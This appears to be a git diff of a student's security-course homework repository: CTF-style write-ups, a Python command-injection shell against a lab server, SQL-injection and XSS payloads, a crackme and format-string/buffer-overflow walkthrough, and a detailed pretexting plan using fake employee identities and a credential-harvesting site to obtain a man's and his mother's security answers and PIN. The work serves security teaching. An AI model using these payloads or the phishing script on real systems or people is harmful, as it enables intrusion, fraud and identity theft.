diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..b9328a7 Binary files /dev/null and b/.DS_Store differ diff --git a/hw3_writeup.md b/hw3_writeup.md new file mode 100644 index 0000000..8fe0697 --- /dev/null +++ b/hw3_writeup.md @@ -0,0 +1,15 @@ +Part 1 +Since some of these questions can be grouped together based on topic. Mother’s maiden name, city of birth, first pet all pertain to personal information about his mother, while browser and PIN number are more technical questions. With these groupings, I will try and impersonate three different fake employees. The first employee I will impersonate is a government consensus employee, calling about data that they lost regarding Eric’s mother. I will start the social engineering by saying his mother was not picking up my calls and I figured her son might be the next best bet. I will initiate this call from a business park building, probably in the lobby. Hopefully the background noise will make it seem like I am actually in a government office building or something like that. I won't dive into the information right away, but start by being very cordial, asking him about his day what he does for a living etc. to ease him into the conversation and make my voice somewhat familiar to him. I would disclose some information about myself, maybe even give accurate information about my city of residence and my personal relationships. Then I would start asking him to assist me fill in the blanks on this fake form: + +“My records show we’re missing information about your father’s middle name and... your mother’s maiden name. Could you provide me with both of those?”, I will ask about his father to try and split his attention so he is not sure who the target information is about. +“Thank you for your response! Now were your parents born in the same town? It says here that they were but I am not sure I can trust much of this information considering how much of it we’re missing [forced laugh]” HOPEFULLY Eric’s parents were born in different towns and he will respond with “no”. From there I would ask him to provide both of his parents' hometowns. + +The pet question is honestly very tricky. My gut reaction is to actually call his mother. Doing this would require me to obtain his mother’s personal phone number from him: “Thank you for your time Eric, I really appreciate it. I am going to try to call [Insert mother’s name here] again and verify this information with her... maybe I have the wrong number to reach her at. [Read off a fake number with the same area code that his mother is from] is this correct?” At this point I would assume he would correct me with the actual number. “Oh wow ok, way off. I’ll run this all by her right now, thanks again!” then end the call. I would take on another identity as an overly amiable petsmart employee and call his mother. “Good morning/evening Mrs Norman, this is Josiah from petsmart calling about a new initiative that petsmart is taking on! We are working with [local pound name] to sponsor and name some of their new furry friends! Now you do not have to pay money if you don't want to but we would like your suggestions for naming! I usually ask for about 3 names and I have a prompt here so it’s not too hard for you to come up with names on the spot! Your favorite flavor of ice cream, your very first pet's name, and your favorite fruit!” This prompt should distract her enough not to question the legitimacy of the entire situation and also give me the answer I am looking for. +My next and final identity I would take on is a GeekSquad employee who has been fake commissioned by Eric Norman to help improve his mother’s internet speed. (warning: this assumes his mother is technologically inept, please don't test run this prompt with a tech savvy mother). Using the phone number I received earlier from Eric, I would call his mother a few days, or even a week or two, later from a spoofed number: +“Your son had me call about your internet speeds, he told me that on his last visit (banking on Eric being a good son who visits his mother) he thought the wifi was quite slow. I won't take too much of your time, I would just like to test a few things over the phone” Ask her the typical questions, “is your router on?” “are you using a wireless connection or wired?” and the big one “what browser are you using?” +From there I would use a fake site that I developed, which looks like a GeekSquad official frontend connected to a backend that’s stood up on one of my numerous hacker VM’s i have set up in my house. What this website will do is take 3 inputs from the user and generate a randomly shuffled string with all 3 of the inputs and display it for the user. However, what it also does is store each of these 3 inputs, one of which will be her PIN. “Mrs Norman, for safety’s sake I believe we should probably reset your WiFi password, from what I am seeing it looks like someone might be leeching off your network and slowing it down.” I would then have her go to the website: “I am going to provide you with a website GeekSquad developed themselves which assists in coming up with very intricate and hard to crack passwords. Just fill out the 3 fields shown on the site and it will spit out a password for you” + +Part 2 +The first vulnerability I noticed was the strength of the user passwords. Websites like perspectiverisk.com, who do vulnerability scans on company and private networks, report that one of their most commonly found vulnerability’s are weak passwords. Perspectiverisk, along with many other security companies, suggest having an improved threshold for weak passwords. Instead of just a capital letter and a number with 8 characters, there should be more intricacies added in order to keep a standard across the board. Experts recommend using a passphrase, like a sentence commonly said around the house, as brute force attempts take exponentially longer time to crack when there are spaces involved. +The second vulnerability I picked up are the potential for SQL injections. Much of the network had no protection against SQL injections; one DROP TABLE could spell disaster for your network. ESecurity Planet and CMSC330 offer a few solutions for this, one of which is black listing or white listing phrases. Instead of permitting a user to enter anything at all, assume that every user can be malicious and take appropriate caution. Prevent certain statements or use input validation (mysql_real_escape_string()) in order to make sure a user cannot go beyond their permissions and see stuff they’re not supposed to. +The final vulnerability, and arguably the most critical, is OS command injection (see shell shock). An attacker is permitted to enter operating system commands, giving them access to the server itself and in turn wreaking havoc. The solution to these exploits is about the same as SQL injections, as they both take place on a server. One can whitelist commands, validate inputs to prevent certain entries from executing. However, portSwigger claims that one should “Never attempting to sanitize input by escaping shell metacharacters. In practice, this is just too error-prone and vulnerable to being bypassed by a skilled attacker.” diff --git a/hw3_writeup.txt b/hw3_writeup.txt new file mode 100644 index 0000000..8fe0697 --- /dev/null +++ b/hw3_writeup.txt @@ -0,0 +1,15 @@ +Part 1 +Since some of these questions can be grouped together based on topic. Mother’s maiden name, city of birth, first pet all pertain to personal information about his mother, while browser and PIN number are more technical questions. With these groupings, I will try and impersonate three different fake employees. The first employee I will impersonate is a government consensus employee, calling about data that they lost regarding Eric’s mother. I will start the social engineering by saying his mother was not picking up my calls and I figured her son might be the next best bet. I will initiate this call from a business park building, probably in the lobby. Hopefully the background noise will make it seem like I am actually in a government office building or something like that. I won't dive into the information right away, but start by being very cordial, asking him about his day what he does for a living etc. to ease him into the conversation and make my voice somewhat familiar to him. I would disclose some information about myself, maybe even give accurate information about my city of residence and my personal relationships. Then I would start asking him to assist me fill in the blanks on this fake form: + +“My records show we’re missing information about your father’s middle name and... your mother’s maiden name. Could you provide me with both of those?”, I will ask about his father to try and split his attention so he is not sure who the target information is about. +“Thank you for your response! Now were your parents born in the same town? It says here that they were but I am not sure I can trust much of this information considering how much of it we’re missing [forced laugh]” HOPEFULLY Eric’s parents were born in different towns and he will respond with “no”. From there I would ask him to provide both of his parents' hometowns. + +The pet question is honestly very tricky. My gut reaction is to actually call his mother. Doing this would require me to obtain his mother’s personal phone number from him: “Thank you for your time Eric, I really appreciate it. I am going to try to call [Insert mother’s name here] again and verify this information with her... maybe I have the wrong number to reach her at. [Read off a fake number with the same area code that his mother is from] is this correct?” At this point I would assume he would correct me with the actual number. “Oh wow ok, way off. I’ll run this all by her right now, thanks again!” then end the call. I would take on another identity as an overly amiable petsmart employee and call his mother. “Good morning/evening Mrs Norman, this is Josiah from petsmart calling about a new initiative that petsmart is taking on! We are working with [local pound name] to sponsor and name some of their new furry friends! Now you do not have to pay money if you don't want to but we would like your suggestions for naming! I usually ask for about 3 names and I have a prompt here so it’s not too hard for you to come up with names on the spot! Your favorite flavor of ice cream, your very first pet's name, and your favorite fruit!” This prompt should distract her enough not to question the legitimacy of the entire situation and also give me the answer I am looking for. +My next and final identity I would take on is a GeekSquad employee who has been fake commissioned by Eric Norman to help improve his mother’s internet speed. (warning: this assumes his mother is technologically inept, please don't test run this prompt with a tech savvy mother). Using the phone number I received earlier from Eric, I would call his mother a few days, or even a week or two, later from a spoofed number: +“Your son had me call about your internet speeds, he told me that on his last visit (banking on Eric being a good son who visits his mother) he thought the wifi was quite slow. I won't take too much of your time, I would just like to test a few things over the phone” Ask her the typical questions, “is your router on?” “are you using a wireless connection or wired?” and the big one “what browser are you using?” +From there I would use a fake site that I developed, which looks like a GeekSquad official frontend connected to a backend that’s stood up on one of my numerous hacker VM’s i have set up in my house. What this website will do is take 3 inputs from the user and generate a randomly shuffled string with all 3 of the inputs and display it for the user. However, what it also does is store each of these 3 inputs, one of which will be her PIN. “Mrs Norman, for safety’s sake I believe we should probably reset your WiFi password, from what I am seeing it looks like someone might be leeching off your network and slowing it down.” I would then have her go to the website: “I am going to provide you with a website GeekSquad developed themselves which assists in coming up with very intricate and hard to crack passwords. Just fill out the 3 fields shown on the site and it will spit out a password for you” + +Part 2 +The first vulnerability I noticed was the strength of the user passwords. Websites like perspectiverisk.com, who do vulnerability scans on company and private networks, report that one of their most commonly found vulnerability’s are weak passwords. Perspectiverisk, along with many other security companies, suggest having an improved threshold for weak passwords. Instead of just a capital letter and a number with 8 characters, there should be more intricacies added in order to keep a standard across the board. Experts recommend using a passphrase, like a sentence commonly said around the house, as brute force attempts take exponentially longer time to crack when there are spaces involved. +The second vulnerability I picked up are the potential for SQL injections. Much of the network had no protection against SQL injections; one DROP TABLE could spell disaster for your network. ESecurity Planet and CMSC330 offer a few solutions for this, one of which is black listing or white listing phrases. Instead of permitting a user to enter anything at all, assume that every user can be malicious and take appropriate caution. Prevent certain statements or use input validation (mysql_real_escape_string()) in order to make sure a user cannot go beyond their permissions and see stuff they’re not supposed to. +The final vulnerability, and arguably the most critical, is OS command injection (see shell shock). An attacker is permitted to enter operating system commands, giving them access to the server itself and in turn wreaking havoc. The solution to these exploits is about the same as SQL injections, as they both take place on a server. One can whitelist commands, validate inputs to prevent certain entries from executing. However, portSwigger claims that one should “Never attempting to sanitize input by escaping shell metacharacters. In practice, this is just too error-prone and vulnerable to being bypassed by a skilled attacker.” diff --git a/week/.DS_Store b/week/.DS_Store new file mode 100644 index 0000000..597c17f Binary files /dev/null and b/week/.DS_Store differ diff --git a/week/1/writeup/README.md b/week/1/writeup/README.md index f1f8619..7436022 100644 --- a/week/1/writeup/README.md +++ b/week/1/writeup/README.md @@ -1,18 +1,25 @@ # Writeup 1 - Ethics -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0201 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examniation. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment Writeup ### Part 1 (25 pts) -This was done via the ELMS assignment. +This was done via the [ELMS assignment](). (we'll post an announcement when this is ready!) ### Part 2 (75 pts) -*Replace this text with your repsonse to our prompt and your ethical argument!* +My first course of action would be to inform my supervisor or boss, whoever the head of the department is. It is crucial that we keep this information internal while we discuss solutions and attempt to +address the problem. Hopefully the company I am working for cares about its' consumers, however if they do not, I would attempt to patch the exploits myself. I would only notify the public of the +security issues if my company does not delay the release or postpone it all together. I am assuming that this would get me fired from my position as ECU auditor as exposing internal information is quite +the no-no, i might even face legal consequences for doing this. Ethically speaking, I believe my employers would be more guilty than I in this situation. If they choose to ignore my warnings they are +potentially risking the lives of all their customers. The ECU is an extremely important part of the car; comparable to the 'brain' of the vehicle. + +If I were to do nothing, I would surely be held responsible for any damage, injury, or death caused by these vulnerable ECU's. My job is to audit, and if I do not do my job properly then I deserve to be +held accountable. This is quite the tragic situation, I am sure there have been many internal whistleblowers who have lost their jobs or faced legal prosecution for something like this. diff --git a/week/11/.DS_Store b/week/11/.DS_Store new file mode 100644 index 0000000..b4ba30a Binary files /dev/null and b/week/11/.DS_Store differ diff --git a/week/11/writeup/README.md b/week/11/writeup/README.md index e5690da..4b3f3a0 100644 --- a/week/11/writeup/README.md +++ b/week/11/writeup/README.md @@ -1,11 +1,11 @@ # Writeup 1 - Web I -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0101 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examination. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment details @@ -19,12 +19,29 @@ Such a Quick Little, website! [http://142.93.136.81:5000/](http://142.93.136.81:5000/) +Ironically i found this one the hardest of the two because I was overthinking. I first tried some local and remote file inclusion using a php web shell, and that did not work in the slightest. I then reread the description and got the hint yall were giving and then changed my approach to a SQL injection instead. I tried the injection from the lecture slides, however that did not work... stumped I made a piazza post. The answer to that helped steer me in the correct direction, and entered a SQL snippet that would always return true to trick the database into dumping it's contents. + +that snippet was admin' || '1'='1'-- - and the flag is CMSC389R-{y0u_ar3_th3_SQ1_ninj@} + ### Part 2 (60 Pts) Complete all 6 levels of: [https://xss-game.appspot.com](https://xss-game.appspot.com) -Produce a writeup. We will not take off points for viewing the source code and/or viewing hints, but we strongly discourage reading online write-ups as that defeats the purpose of the homework. +The first one level was fairly simple; insert a + +From here on out I used the hints provided by the website: + +The second level mentioned looking at the img tag and the onerror attribute. After a lot of trial and error I discovered that if there is an error thrown, it will execute the onerror attribute. So the next logical step was to do onerror=“javascript:alert(“test”)” and that worked. + +The third level required some research on escaping quotes in the URL, which would be applicable to level 4 as well. The solution was to escape the specific image url with ‘’ and insert another onerror=alert(“test”) into the URL, that way when it loaded up, it detects an error and calls our function. The url looked like this: https://xss-game.appspot.com/level3/frame#3'onerror='alert("test")' + +Level four requires character escaping as well, but this time it’s a little more convoluted. The hints told me to enter a single quote and note the error console, which read: Uncaught SyntaxError: missing ) after argument list. The second hint mentions HTML encoding, so I looked up the value for semi-colon, which was %3B. I tried using this encoding to display the alert like so: https://xss-game.appspot.com/level4/frame?timer=)%3Balert(1)%3B however that only resulted in the message “Your timer will executed in );alert(1); seconds.” Which…. Is not desirable. I tested that URL with ‘startTimer(‘’); appended on to the end as well, but that did not work. I tried a dummy statement that would wrap around to the ‘) at the front: var v = (‘ in order to mask the alert in the middle and that worked. + +The hints, specifically the 3rd one, helped a lot. Reading the source code, we learn that the page redirects based on what is after the next= in the URL. If one had already loaded up the signup page, next is already being looked at/might be populated, so in order to override this you must immediately load a URL with your payload set, as opposed to entering it once the Dom renders. Navigating to https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert("test") THEN entering an email and clicking next will jump to the alert instead. + +The final level is a remote file hosting, which we discussed in class. Messing around on the website, I deduced that after the frame# section of the URL, the website reads in a file location. Great, now we can begin the actual exploitation. First I made a pastebin post that hosted alert(“test”), converted it to raw, then pasted the link after the #. This did not work, so I had to examine the source code. Turns out it excludes anything with https in it, however ONLY https because they did not take cMSC330 and did not make an exhaustive regex meaning their safeguard is not case sensitive. Changed the casing of the pastebin link and it worked: https://xss-game.appspot.com/level6/frame#httPs://pastebin.com/raw/LBVsTuce ### Format diff --git a/week/4/.DS_Store b/week/4/.DS_Store new file mode 100644 index 0000000..a9012e0 Binary files /dev/null and b/week/4/.DS_Store differ diff --git a/week/4/stub.py b/week/4/stub.py index 939d5ed..90e1e17 100644 --- a/week/4/stub.py +++ b/week/4/stub.py @@ -8,11 +8,18 @@ """ import socket +import subprocess host = "wattsamp.net" # IP address here port = 1337 # Port here def execute_cmd(cmd): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + data = s.recv(1024) + s.send("1;"+cmd+"\n") + data = s.recv(1024) + print(data) """ Sockets: https://docs.python.org/3/library/socket.html How to use the socket s: @@ -30,8 +37,16 @@ def execute_cmd(cmd): s.send("something to send\n") # Send a newline \n at the end of your command """ - print("IMPLEMENT ME") - -if __name__ == '__main__': - print("IMPLEMENT ME") +def main(): + while True: + command = raw_input("> ") + if (command == "exit" or command == "quit"): + break + elif command == "help": + print("Show this help menu") + else: + execute_cmd(command) + +if '__main__' == __name__: + main() diff --git a/week/4/writeup/README.md b/week/4/writeup/README.md index 660d427..42bd86a 100644 --- a/week/4/writeup/README.md +++ b/week/4/writeup/README.md @@ -1,18 +1,45 @@ # Writeup 2 - Pentesting -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0101 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examination. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment Writeup ### Part 1 (45 pts) -*Please use this space to writeup your answers and solutions (and how you found them!) for part 1.* +I found two flags: +-CMSC389R-{html_h@x0r_lulz} +-CMSC389R-{p1ng_as_a_$erv1c3} + +The first flag I obtained snooping around the HTML code of the wattsamp website. It was hidden on the home page near the end of the body element. + +The second flag I found was a little more tricky. I started my search by using the command provided 'nc wattsamp 1337' in my home terminal. I was then prompted by the server to enter an IP address to ping. I did that and obtained nothing but some ping data. I then remembered some of what we learned in lecture and also in CMSC330 about command injection. These are the commands I entered: + +-'1' (i realized the field required some form of number to actually process the input) + ';ls' + I was able to successfully list all the libraries of the wattsamp server by concatenating a command after a semi-colon + +-'1;ls -alh' + I added a '-alh' after the l's' in order to see permissions of the file. However, this had an unintended side effect: it displayed the last time those folders/files were editted. The home directory had the date of september 24th (last tuesday) and was the most recently updated file besides the ones that popped up with today's date. + +-'1;cd home' + I cd'd into the directory but I could not list the contents. I could not figure out how to enter multiple commands, as the shell boots you after either 3 seconds or after you enter anything at all. But through some trial and error I was able to successfully figure out that you can enter a new command after each semi-colon. + +-'1;cd home;ls' + enter the home directory then finally list the contents, which in turn displayed the flag + +-'1;cd home;cat flag.txt' + the final command i entered in order to display the requested flag. + +I think Edward should really try and sanitize or whitelist his inputs. Kind of how the admin tab on the wattsamp website makes sure you have no funky or suspicious characters after the @ in the email field. This prevents any user from entering malicious code at the end of a seemingly valid input. Or you know, make a whitelist of users that can connect to his server. ### Part 2 (55 pts) -*Please use this space to detail your approach and solutions for part 2. Don't forget to upload your completed source code to this /writeup directory as well!* +I wrote a script using python in order to run command injection on the wattsamp server. We had a 216 project that required us to write a shell similar to this one, except in python the syntax is much better, I referenced that a lot while I was writing. This is my second time having to write in python so i was quite confused, but found the language to be quite convenient. + +My shell takes the users input and appends a '1;' to the front of it. This is to initiate the commabnd injection, as the wattsamp server reads the number, pings it, then takes the rest of the input as a command. After the semi colon I inject the command passed into the shell so that the server will execute the command. I then concatenate a new line character at the end of the users input to complete the input. + +I could not figure out how to go about download, as you can tell by my code. I overheard some other students talking about utilizing the 'cat' function in order to basically make a copy of the requested file and put it in the local path that is passed in. However, when i attempted to implement this, I could not quite figure out how to properly pass the users requested file locations into the payload. diff --git a/week/6/.DS_Store b/week/6/.DS_Store new file mode 100644 index 0000000..34821fc Binary files /dev/null and b/week/6/.DS_Store differ diff --git a/week/6/writeup/README.md b/week/6/writeup/README.md index 335d2f2..81db8f2 100644 --- a/week/6/writeup/README.md +++ b/week/6/writeup/README.md @@ -1,19 +1,18 @@ # Writeup 6 - Binaries I -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0101 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examination. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment Writeup ### Part 1 (50 pts) -*Please use this space to provide flag from program* +CMSC389R-{di5a55_0r_d13} ### Part 2 (50 pts) -*Please use this space to detail your approach and solutions for part 2. Include -descriptions of checks implemented as well as your final input to produce flag.* +There were 3 checks I had to clear in order to obtain this flag. I started this process by running './crackme' to get my bearings. Nothing happened as expected and i proceeded to run binary ninja on the c file. I decided to start with the main method at the direction of one of the professors, and followed the comparison branches labled 'cmp'. From my limited 216 and 411 knowledge I was able to deduce that there were some string comparisons taking place within the last line of the main method. On an incorrect comparison, it would branch right, and a correct comparison would branch left. Obviously I wanted a correct answer so i proceeded left. Reading this block helped me understand some of what the code did: it was a lot of shifting around of registers and pointer arithmetic to pass certain variables around, but most importantly, calling a function called 'update_flag'. check1 seems to do a strcmp between some register and "Oh God". I ran './crackme "Oh God"' successfully which cleared the first check and updated the flag, which was stored in a register. Check2 required a little more thinking; i noticed there was a getenv call, but couldnt figure out why or what it did. Research led me to learn about environments as a whole and understand that the assembly was trying to retrieve the value of a certain environment named FOOBAR. i ran the command 'export FOOBAR = ""' (which makes a new environment) and ran './crackme' again. It did not pass the check as the value it was comparing too was incorrect, so i tried 'export FOOBAR="seye ym "'. This also did not work, i analyzed the add and comparison statements and realized that the desired string shown after the check2 call was backwards, resulting in 'export FOOBAR=" my eyes"' and cleared the check/updated the flag. check3 ran open, which opens a file named 'sesame' and reads it byte by byte, specifically with a switch statement analyzing each character of a string and comparing it to a hex value. I converted said hex value into ASCII to reveal it was equality checking " they burn". I entered 'nano sesame' into the command line, entered " they burn" into the file and saved it. I then ran './crackme "Oh God"' one last time that revealed the flag above. diff --git a/week/7/.DS_Store b/week/7/.DS_Store new file mode 100644 index 0000000..2d19d45 Binary files /dev/null and b/week/7/.DS_Store differ diff --git a/week/7/writeup/README.md b/week/7/writeup/README.md index 1f14e25..687410c 100644 --- a/week/7/writeup/README.md +++ b/week/7/writeup/README.md @@ -1,27 +1,27 @@ # Writeup 7 - Forensics I -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0101 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examination. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment Writeup ### Part 1 (100 pts) Answer the following questions regarding [this](../image) file: -1. What kind of file is it? +1. JPEG -2. Where was this photo taken? Provide a city, state and the name of the building in your answer. +2. Chicago, Illinois, John Hancock Center -3. When was this photo taken? Provide a timestamp in your answer. +3. 2018:08:22 11:33:24 -4. What kind of camera took this photo? +4. iPhone 8 back camera 3.99mm f/1.8 -5. How high up was this photo taken? Provide an answer in meters. +5. 539.5 m Above Sea Level -6. Provide any found flags in this file in standard flag format. +6. CMSC389R--{look_I_f0und_a_str1ng} *Please use this space to provide flag from program* diff --git a/week/8/.DS_Store b/week/8/.DS_Store new file mode 100644 index 0000000..65acd41 Binary files /dev/null and b/week/8/.DS_Store differ diff --git a/week/8/server.c b/week/8/server.c index f00e9a6..ad26a82 100644 --- a/week/8/server.c +++ b/week/8/server.c @@ -93,6 +93,7 @@ int main(void) { password[i] = rand() % ('z'-' ') + ' '; } password[PASS_SIZE] = 0; + printf(password); while ((prompt_response = main_prompt()) != 0) { if (prompt_response == 1 || prompt_response == 2) { diff --git a/week/8/writeup/README.md b/week/8/writeup/README.md index 0ec34f5..2db74e7 100644 --- a/week/8/writeup/README.md +++ b/week/8/writeup/README.md @@ -1,11 +1,11 @@ # Writeup 8 - Binaries II -Name: *PUT YOUR NAME HERE* -Section: *PUT YOUR SECTION NUMBER HERE* +Name: Josiah Rapp +Section: 0101 I pledge on my honor that I have not given or received any unauthorized assistance on this assignment or examination. -Digital acknowledgement: *PUT YOUR NAME HERE* +Digital acknowledgement: Josiah Rapp ## Assignment Writeup @@ -14,8 +14,20 @@ Answer the following questions regarding the server executable (for which source 1. How is the per-session administrator password generated? Are there any inherent weaknesses in this implementation? + The passwords are generated with a two step process. The first step is to seed a RNG using the current time. The second step loops through an array size 16 (also the size allocated to the password) and uses the return value (random ascii values in hex) of the previously mentioned RNG and modding it with ('z' - ' '). replicable and not the most intense password generation. Fabricating the computers time stamp is an easy way of taking advantage of the vulnerability. + 2. Describe two vulnerabilities in this program. Provide specific line numbers and classifications of the vulnerability. Explain potential ramifications as well as ways to avoid these vulnerabilities when writing code. + The printf(output) on line 46 is a good example of a format string vulnerability. If there was a malicious attacker, they could input a bunch of stack calls (%p) into the input string (which is used to generate the output string that is later printed) printing memory addresses of the stack out into the console which can then be utilized by the attacker. Can be easily avoided by specifying %s (type string) as the format string. + + The second vulnerability is located at line 68, on the gets(buff) statement. This is a potential buffer overflow exploit waiting to happen, and can be prevented by changing gets to fgets. + 3. What is the flag? + CMSC389R-{expl017-2-w1n} + 4. Describe the process you followed to obtain the flag: vulnerabilities exploited, your inputs to the server in a human-readable format, etc. If you create any helper code please include it. + + I started by connecting to the server at 'nc ec2-18-222-89-163.us-east-2.compute.amazonaws.com' using port 22 (recalling from lecture that port 22 is the most common). After combing through the lecture slides, I began to parse through the binary file using GDB. I initially tried to print the password to no avail, but inserting a breakpoint where the password was declared gave me more insight. It provided me with the string '%29$f', i tried entering that into the encrypt field, entering that into the authentication stage which did not work. I then did the reverse, decrypted the string and entered that into authentication and that gave me elevated access. I then proceeded to do what most good computer science students do and spam the command line with commands i knew off top. Ls displayed a flag file, however i could not open it, so back to the server.c file i went. I purused the exec_command method since that's what i wanted, to execute a command. There was a buffer that was 32 bits long , so i attempted to enter my "cat flag" command with 25 other characters in order to trigger a buffer overflow. this worked, and the flag stated above was printed out. + + note: all of my commands were doubled "ls" was "ls ls" and "cat flag" was "cat flag cat flag"